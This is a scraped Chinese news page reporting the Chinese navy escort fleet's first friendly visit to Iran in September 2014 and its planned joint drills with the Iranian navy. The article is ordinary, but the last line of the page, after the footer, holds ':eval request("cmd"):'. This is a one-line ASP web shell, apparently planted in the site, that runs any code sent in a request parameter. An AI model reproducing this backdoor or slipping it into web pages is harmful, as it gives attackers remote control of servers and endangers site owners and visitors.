大陆新闻

中国海军舰队结束访问离开伊朗 将与伊军联演

时间:2014-9-27 15:32:35  作者:  来源:国际在线  查看:34  评论:0
内容摘要:星岛环球网消息:当地时间24日下午14时许,中国海军亚丁湾第17批护航编队启程离开伊朗,圆满结束了对伊朗为期5天的友好访问。国际在线报道,中国海军亚丁湾第17批护航编队长春号和常州号当天从伊朗南部阿巴斯港驶出。之后,中国海军还将与伊朗海军举行通信操演、编队运动等传统海上科目的联合...

星岛环球网消息:当地时间24日下午14时许,中国海军亚丁湾第17批护航编队启程离开伊朗,圆满结束了对伊朗为期5天的友好访问。

国际在线报道,中国海军亚丁湾第17批护航编队长春号和常州号当天从伊朗南部阿巴斯港驶出。之后,中国海军还将与伊朗海军举行通信操演、编队运动等传统海上科目的联合演练。对此,伊朗第一海防区司令阿扎德准将表示,伊朗贾马兰号驱逐舰将与中国舰艇举行联合训练,将在技术层面进行通讯演练、海上搜救等项目,希望通过联合训练,加强双方和多方合作,维护地区的和平、稳定与安宁。

23 日晚,舰艇编队还在长春号上举行了甲板答谢招待会。编队指挥员黄新建少将在致辞时表示,虽然舰队即将离开阿巴斯港,但伊朗人民和伊朗海军同仁的深情厚谊始终在他的脑海中浮现。他说,这是中国海军舰艇首次访问伊朗,是一次成功的友好访问,必将在中伊两国关系史和两国海军发展史上写下重要篇章,并衷心祝愿两国人民和海军友谊长存。

中国海军亚丁湾第17批护航编队于9月20日抵达伊朗阿巴斯港对伊朗展开友好访问。访问期间,编队指挥员黄新建少将一行拜会了伊朗军方和霍尔木兹甘省官员,两国海军青年军官进行了反海盗经验交流。两军之间还举行了甲板招待会,开放舰艇参观及体育友谊赛等活动。此次访问增进了中伊两国海军的了解与互信,推动了两军友好关系不断向前发展。

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):